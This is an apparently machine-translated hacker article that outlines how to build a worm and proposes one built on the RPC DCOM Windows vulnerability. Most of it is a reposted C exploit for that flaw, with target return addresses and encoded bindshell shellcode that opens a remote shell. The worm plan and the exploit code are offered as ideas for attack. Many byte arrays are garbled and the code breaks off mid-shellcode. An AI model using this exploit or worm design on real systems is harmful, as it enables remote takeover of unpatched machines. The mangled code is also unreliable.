Concept of rpc dcom Worm

Recently, it seems that almost every major vulnerability has been published, and a worm (worm) targeting this vulnerability will pop up, the recently fierce rpc dcom vulnerability is estimated to become a new vector of worm. It seems that writing worm is a hot topic, and many people are curious. They think worm is a very deep technology. In fact, this is a very simple programming game. I have always wanted to write a technical analysis on worm (--- to avoid teaching the child), but I have never been too lazy to write, and I have lost interest in writing worms, now, before the arrival of the new worm storm, I will analyze the worm-related technologies and give some ideas about the RPC DCOM worm. When I am helping the "hacker" to abuse or deliberately show off, I think I still want to write this article. I have not written any article for more than a year, but I have also made my own wish. You can choose not to continue reading, but do not spit on me after reading. :)

What is worm?

First, he Excerpted from spark's article "definitions and history of Internet Worms": the biological term worm was written by John F of Xerox PARC in 1982. shoch and others first introduced the computer field [30] and gave two basic features of Computer Worms: "moving from one computer to another" and "self-replication ". The purpose of writing worms is to conduct Model Tests on distributed computing. In their articles, the destructive and difficult-to-control aspects of worms have begun to emerge. Eugene H. to distinguish between worms and viruses, Spafford defines the technical perspective of worms. "computer worms can run independently and spread a version of itself containing all the functions to another computer. "(Worm is a program that can run by itself and can propagate a fully working version of itself to other machines .).

Since this is not to introduce you to the definition and history of worms is not much said, if you are interested in these, you can read the spark article here http://www.nsfocus.net/index.php? Act = magazine &; do = view & mid = 1851

Components of the second worm

The composition of a worm is actually very simple. Because I didn't teach you how to write a worm here, or because of time constraints, I just want to make a simple introduction here.

We can regard it as a project. We divide this project into four modules:

1. Attack Module

First, you must have a large number of serious vulnerabilities that can be easily exploited by the system to remotely control the machine. For example, weak password or remote overflow.

2. Infection Module

Consider how to infect a host by executing the functions you want to implement after the target party is attacked. Shellcode is perfect for remote overflow. In this case, we need to consider the transmission (reproduction) of infection.

3. transmission module

For example, scan a machine with weak network segments, store a file, attack these IP addresses, or randomly generate IP addresses and then attack these IP addresses.

Simply put, scan weak machines.

4. Functional Modules

The functional module is actually an Optional module, but if you want the other side to add backdoor/DDoS and other functions after the other side is infected with a worm, you must have this.

In fact, the key to a worm success is an attack module and an infection module. :)

3. propagation (reproduction) of common worms

I will not go into details, just a simple list:

1. email

2. ftp

3. http

4. netbios

5. tftp

6. rcp

7. Others

Introduction to rpc dcom Vulnerabilities

The rpc dcom vulnerability is a recent severe Windows vulnerability and the most influential Windows vulnerability in history.

Remote Procedure Call (RPC) is a protocol applied to Windows operating systems. RPC provides a mechanism for mutual communication, allowing computers running the program to execute code on a remote system. The RPC protocol itself originated from the OSF (Open Software Foundation) RPC protocol, and later added some additional Microsoft-specific extensions. Remote attackers can exploit this vulnerability to execute arbitrary commands on the system with Local System privileges. This defect affects the DCOM interface that uses RPC. The reason for this interface is that the client machine sends a DCOM object activation request (such as a UNC path) to the server ). Attackers can exploit this vulnerability to execute arbitrary commands with Local System privileges. Attackers can perform arbitrary operations on the system, such as installing programs, viewing or modifying data, deleting data, or creating accounts with system administrator privileges.

This vulnerability affects the following Windows Versions:

Microsoft Windows XP SP1a

Microsoft Windows XP SP1

Microsoft Windows XP

Microsoft Windows NT 4.0SP6a

Microsoft Windows NT 4.0SP6

Microsoft Windows NT 4.0SP5

Microsoft Windows NT 4.0SP4

Microsoft Windows NT 4.0SP3

Microsoft Windows NT 4.0SP2

Microsoft Windows NT 4.0SP1

Microsoft Windows NT 4.0

In Microsoft Windows 2003

Microsoft Windows 2000SP4

Microsoft Windows 2000SP3

Microsoft Windows 2000SP2

Microsoft Windows 2000SP1

In Microsoft Windows 2000

As you can see, this vulnerability affects all Windows systems except Windows systems of WinME or earlier versions. At the same time, this vulnerability can be remotely exploited by attackers,

Attackers can remotely execute arbitrary code on machines that do not fix the vulnerability, allowing them to have full control over machines with the vulnerability.

Five rpc dcom worm ideas

1. as rpc com has launched a general attack code for unpatched Win2000/WinXP attacks, therefore, this vulnerability is more likely to be exploited to become a worm that can infect Win2000/WinXP machines with the rpc dcom vulnerability.

Such as the Exploit for Win2000 and WinXP published on PacketStorm:

/* Windows 2003 <= remote rpc dcom exploit

* Coded by.: [oc192.us]:. Security

*

* Features:

*

*-D destination host to attack.

*

*-P for port selection as exploit works on ports other than 135 (139,445,539 etc)

*

*-R for using a custom return address.

*

*-T to select target type (Offset), this includes des universal offsets-

* Win2k and winXP (Regardless of service pack)

*

*-L to select bindshell port on remote machine (Default: 666)

*

*-Shellcode has been modified to call ExitThread, rather than ExitProcess, thus

* Preventing crash of RPC service on remote machine.

*

* This is provided as proof-of-concept code only for educational

* Purposes and testing by authorized individuals with permission

* Do so.

*/

# Include

# Include

# Include

# Include

# Include

# Include

# Include

# Include

# Include

# Include

/* Xfocus start */

Unsigned char bindstr [] = {

0x00, 0x0B, 0x10, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0x00, 0x00, 0 x, 0 x, 0 x, 0x00,

0xD0, 0x16, 0xD0, 0x16, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x,

0xa0, 0x01,0 x, 0 x, 0 x, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00,

0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08,0x00,

0x2B, 0x10, 0x48, 0x60, 0 x, 0 x, 0x00 };

Unsigned char request1 [] = {

0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xE8, 0x03

, 0 x, 0x00, 0xE5, 0 x, 0 x, 0x00, 0xD0, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0x0, 0 x, 0x0, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 58, 0xFD, 0xCC, 0x45

, 0x64, 0x49, 0xB0, 0x70, 0xDD, 0xAE, 0x74, 0x2C, 0x96, 0xD2, 0x60, 0x5E, 0x0D, 0 x, 0 x, 0x00

, 0x00,0x00,0x00,0x00,0x00,0x00,0x70, 0x5E, 0x0D, 0x00,0x02,0x00,0x00,0x00, 0x7C, 0x5E

, 0x0D, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 96, 0xF1, 0xF1, 0x2A, 0x4D

, 0xCE, 0x11, 0xA6, 0x6A, 0x00,0x20, 0xAF, 0x6E, 0x72, 0xF4, 0x0C, 0x00,0x00,0x00, 0x4D, 0x41

, 0x0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0x0D, 0xF0, 0xAD, 0xBA, 0 x, 0x00

, 0 x, 0x00, 0xA8, 0xF4, 0x0B, 0 x, 0x60, 0 x, 0 x, 0 x, 0x60, 0 x, 0 x, 0x00, 0x4D, 0x45

, 0x4F, 0x57,0x04,0x00,0x00,0x00, 0xA2, 0x01,0x00,0x00,0x00,0x00,0x00,0x00, 0xC0, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0 0 0 0 0, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x03

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xC8, 0x00

, 0 x, 0x00, 0x4D, 0x45, 0x4F, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xC4, 0x28, 0xCD, 0 x, 0x64, 0x29

, 0xCD, 0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00, 0xB9, 0x01,0x00,0x00,0x00,0x00,0x00

, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0x46, 0xAB, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0x46, 0xA5, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0x46, 0xA6, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0x46, 0xA4, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0x46, 0xAD, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0x46, 0xAA, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0x00, 0xC0, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x60, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x10

, 0 x, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x50, 0 x, 0 x, 0x00, 0x4F, 0xB6, 0 x, 0x20, 0xFF, 0xFF

, 0xFF, 0xFF, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x10

, 0 x, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x0, 0x09

, 0 x, 0 x, 0 x, 0 x, 0x00, 0 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 00

, 0 x, 0 x, 0 x, 0x19, 0x0C, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0, 0 x, 0 x, 0x00

, 0x00,0x00,0x70, 0xD8, 0x98,0x93,0x98, 0x4F, 0xD2, 0x11, 0xA9, 0x3D, 0xBE, 0x57, 0xB2, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x80, 0x00

, 0 x, 0x00, 0x0D, 0xF0, 0xAD, 0xBA, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x60, 0x00

, 0 x, 0 x, 0x60, 0 x, 0 x, 0x00, 0x4D, 0x45, 0x4F, 0x57,0 x, 0 x, 0 x, 0x00, 0xC0, 0x01

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x46, 0x3B, 0x03

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x81, 0xC5, 0x17,0 x, 0x80, 0x0E

, 0xE9, 0x4A, 0x99,0x99, 0xF1, 0x8A, 0x50, 0x6F, 0x7A, 0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x30, 0x00

, 0 x, 0 x, 0 x, 0x00, 0x6E, 0 x, 0 x, 0 x, 0 x, 0x00, 0xD8, 0xDA, 0x0D, 0 x, 0 x, 0x00

, 0x00,0x00,0x00,0x00,0x00,0x00,0x20, 0x2F, 0x0C, 0x00,0x00,0x00,0x00,0x00,0x00,0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x10, 0x00

, 0x00,0x00,0x30,0x00, 0x2E, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x68, 0x00

, 0 x, 0x00, 0x0E, 0x00, 0xFF, 0xFF, 0x68, 0x8B, 0x0B, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00 };

Unsigned char request2 [] = {

0x20, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0x00,0x00, 0x5C, 0x00, 0x5C, 0x00 };

Unsigned char request3 [] = {

0x5C, 0x00

, 0 x, 0 x, 0x24, 0x00, 0x5C, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x

, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00

, 0x2E, 0x00,0x64,0x00, 0x6F, 0x00,0x63,0x00,0x00,0x00 };

/* End xfocus */

Int type = 0;

Struct

{

Char * OS;

U_long ret;

}

Targets [] =

{

{"[Win2k-Universal]", 0x0018759F },

{"[WinXP-Universal]", 0x0100139d },

}, V;

Void usage (char * prog)

{

Int I;

Printf ("rpc dcom exploit coded by.: [oc192.us]:. Security \ n ");

Printf ("Usage: \ n ");

Printf ("% s-d [options] \ n", prog );

Printf ("Options: \ n ");

Printf ("-d: Hostname to attack [Required] \ n ");

Printf ("-t: Type [Default: 0] \ n ");

Printf ("-r: Return address [Default: Selected from target] \ n ");

Printf ("-p: Attack port: [Default: 135] \ n ");

Printf ("-l: Bindshell port [Default: 666] \ n ");

Printf ("Types: \ n ");

For (I = 0; I <sizeof (targets)/sizeof (v); I ++)

Printf ("% d [0x %. 8x]: % s \ n", I, targets [I]. ret, targets [I]. OS );

Exit (0 );

}

Unsigned char SC [] =

"\ X46 \ x00 \ x58 \ x00 \ x4E \ x00 \ x42 \ x00 \ x46 \ x00 \ x58 \ x00"

"\ X46 \ x00 \ x58 \ x00 \ x4E \ x00 \ x42 \ x00 \ x46 \ x00 \ x58 \ x00 \ x46 \ x00 \ x58 \ x00"

"\ X46 \ x00 \ x58 \ x00 \ x46 \ x00 \ x58 \ x00"

"\ Xff"/* return address */

"\ Xcc \ xe0 \ xfd \ x7f"/* primary thread data block */

"\ Xcc \ xe0 \ xfd \ x7f"/* primary thread data block */

/* Bindshell no RPC crash, defineable spawn port */

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90"

"\ X90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ xeb \ x19 \ x5e \ x31 \ xc9 \ x81 \ xe9 \ x89 \ xff"

"\ Xff \ x81 \ x36 \ x80 \ xbf \ x32 \ x94 \ x81 \ xee \ xfc \ xff \ xe2 \ xf2"

"\ Xeb \ x05 \ xe8 \ xe2 \ xff \ x03 \ x53 \ x06 \ x1f \ x74 \ x57 \ x75 \ x95 \ x80"

"\ Xbf \ xbb \ x92 \ x7f \ x89 \ x5a \ x1a \ xce \ xb1 \ xde \ x7c \ xe1 \ xbe \ x32 \ x94 \ x09"

"\ Xf9 \ x3a \ x6b \ xb6 \ xd7 \ x9f \ x4d \ x85 \ x71 \ xda \ xc6 \ x81 \ xbf \ x32 \ x1d \ xc6"

"\ Xb3 \ x5a \ xf8 \ xec \ xbf \ x32 \ xfc \ xb3 \ x8d \ x1c \ xf0 \ xe8 \ xc8 \ x41 \ xa6 \ xdf"

"\ Xeb \ xcd \ xc2 \ x88 \ x36 \ x74 \ x90 \ x7f \ x89 \ x5a \ xe6 \ x7e \ x0c \ x24 \ x7c \ xad"

"\ Xbe \ x32 \ x94 \ x09 \ xf9 \ x22 \ x6b \ xb6 \ xd7 \ xdd \ x5a \ x60 \ xdf \ xda \ x8a \ x81"

"\ Xbf \ x32 \ x1d \ xc6 \ xab \ xcd \ xe2 \ x84 \ xd7 \ xf9 \ x79 \ x7c \ x84 \ xda \ x9a \ x81"

"\ Xbf \ x32 \ x1d \ xc6 \ xa7 \ xcd \ xe2 \ x84 \ xd7 \ xeb \ x9d \ x75 \ x12 \ xda \ x6a \ x80"

"\ Xbf \ x32 \ x1d \ xc6 \ xa3 \ xcd \ xe2 \ x84 \ xd7 \ x96 \ x8e \ xf0 \ x78 \ xda \ x7a \ x80"

"\ Xbf \ x32 \ x1d \ xc6 \ x9f \ xcd \ xe2 \ x84 \ xd7 \ x96 \ x39 \ xae \ x56 \ xda \ x4a \ x80"

"\ Xbf \ x32 \ x1d \ xc6 \ x9b \ xcd \ xe2 \ x84 \ xd7 \ xd7 \ xdd \ x06 \ xf6 \ xda \ x5a \ x80"

"\ Xbf \ x32 \ x1d \ xc6 \ x97 \ xcd \ xe2 \ x84 \ xd7 \ xd5 \ xed \ x46 \ xc6 \ xda \ x2a \ x80"

"\ Xbf \ x32 \ x1d \ xc6 \ x93 \ x01 \ x6b \ x01 \ x53 \ xa2 \ x95 \ x80 \ xbf \ x66 \ xfc \ x81"

"\ Xbe \ x32 \ x94 \ x7f \ xe9 \ x2a \ xc4 \ xd0 \ xef \ x62 \ xd4 \ xd0 \ xff \ x62 \ x6b \ xd6"

"\ Xa3 \ xb9 \ x4c \ xd7 \ xe8 \ x5a \ x96 \ x80 \ xae \ x6e \ x1f \ x4c \ xd5 \ x24 \ xc5 \ xd3"

"\ X40 \ x64 \ xb4 \ xd7 \ xec \ xcd \ xc2 \ xa4 \ xe8 \ x63 \ xc7 \ x7f \ xe9 \ x1a \ x1f \ x50"

"\ Xd7 \ x57 \ xec \ xe5 \ xbf \ x5a \ xf7 \ xed \ xdb \ x1c \ x1d \ xe6 \ x8f \ xb1 \ x78 \ xd4"

"\ X32 \ x0e \ xb0 \ xb3 \ x7f \ x01 \ x5d \ x03 \ x7e \ x27 \ x3f \ x62 \ x42 \ xf4 \ xd0 \ xa4"

"\ Xaf \ x76 \ x6a \ xc4 \ x9b \ x0f \ x1d \ xd4 \ x9b \ x7a \ x1d \ xd4 \ x9b \ x7e \ x1d \ xd4"

"\ X9b \ x62 \ x19 \ xc4 \ x9b \ x22 \ xc0 \ xd0 \ xee \ x63 \ xc5 \ xea \ xbe \ x63 \ xc5 \ x7f"

"\ Xc9 \ x02 \ xc5 \ x7f \ xe9 \ x22 \ x1f \ x4c \ xd5 \ xcd \ x6b \ xb1 \ x40 \ x64 \ x98 \ x0b"

"\ X77 \ x65 \ x6b \ xd6 \ x93 \ xcd \ xc2 \ x94 \ xea \ x64 \ xf0 \ x21 \ x8f \ x32 \ x94 \ x80"

"\ X3a \ xf2 \ xec \ x8c \ x34 \ x72 \ x98 \ x0b \ xcf \ x2e \ x39 \ x0b \ xd7 \ x3a \ x7f \ x89"

"\ X34 \ x72 \ xa0 \ x0b \ x17 \ x8a \ x94 \ x80 \ xbf \ xb9 \ x51 \ xde \ xe2 \ xf0 \ x90 \ x80"

"\ Xec \ x67 \ xc2 \ xd7 \ x34 \ x5e \ xb0 \ x98 \ x34 \ x77 \ xa8 \ x0b \ xeb \ x37 \ xec \ x83"

"\ X6a \ xb9 \ xde \ x98 \ x34 \ x68 \ xb4 \ x83 \ x62 \ xd1 \ xa6 \ xc9 \ x34 \ x06 \ x1f \ x83"

"\ X4a \ x01 \ x6b \ x7c \ x8c \ xf2 \ x38 \ xba \ x7b \ x46 \ x93 \ x41 \ x86 \ x3f \ x97 \ x78"

"\ X54 \ xc0 \ xaf \ xfc \ x9b \ x26 \ xe1 \ x61 \ x34 \ x68 \ xb0 \ x83 \ x62 \ x54 \ x1f \ x8c"

"\ Xf4 \ xb9 \ xce \ x9c \ xbc \ xef \ x1f \ x84 \ x34 \ x31 \ x51 \ x6b \ xbd \ x01 \ x54 \ x0b"

"\ X6a \ x6d \ xca \ xdd \ xe4 \ xf0 \ x90 \ x80 \ x2f \ xa2 \ x04 ";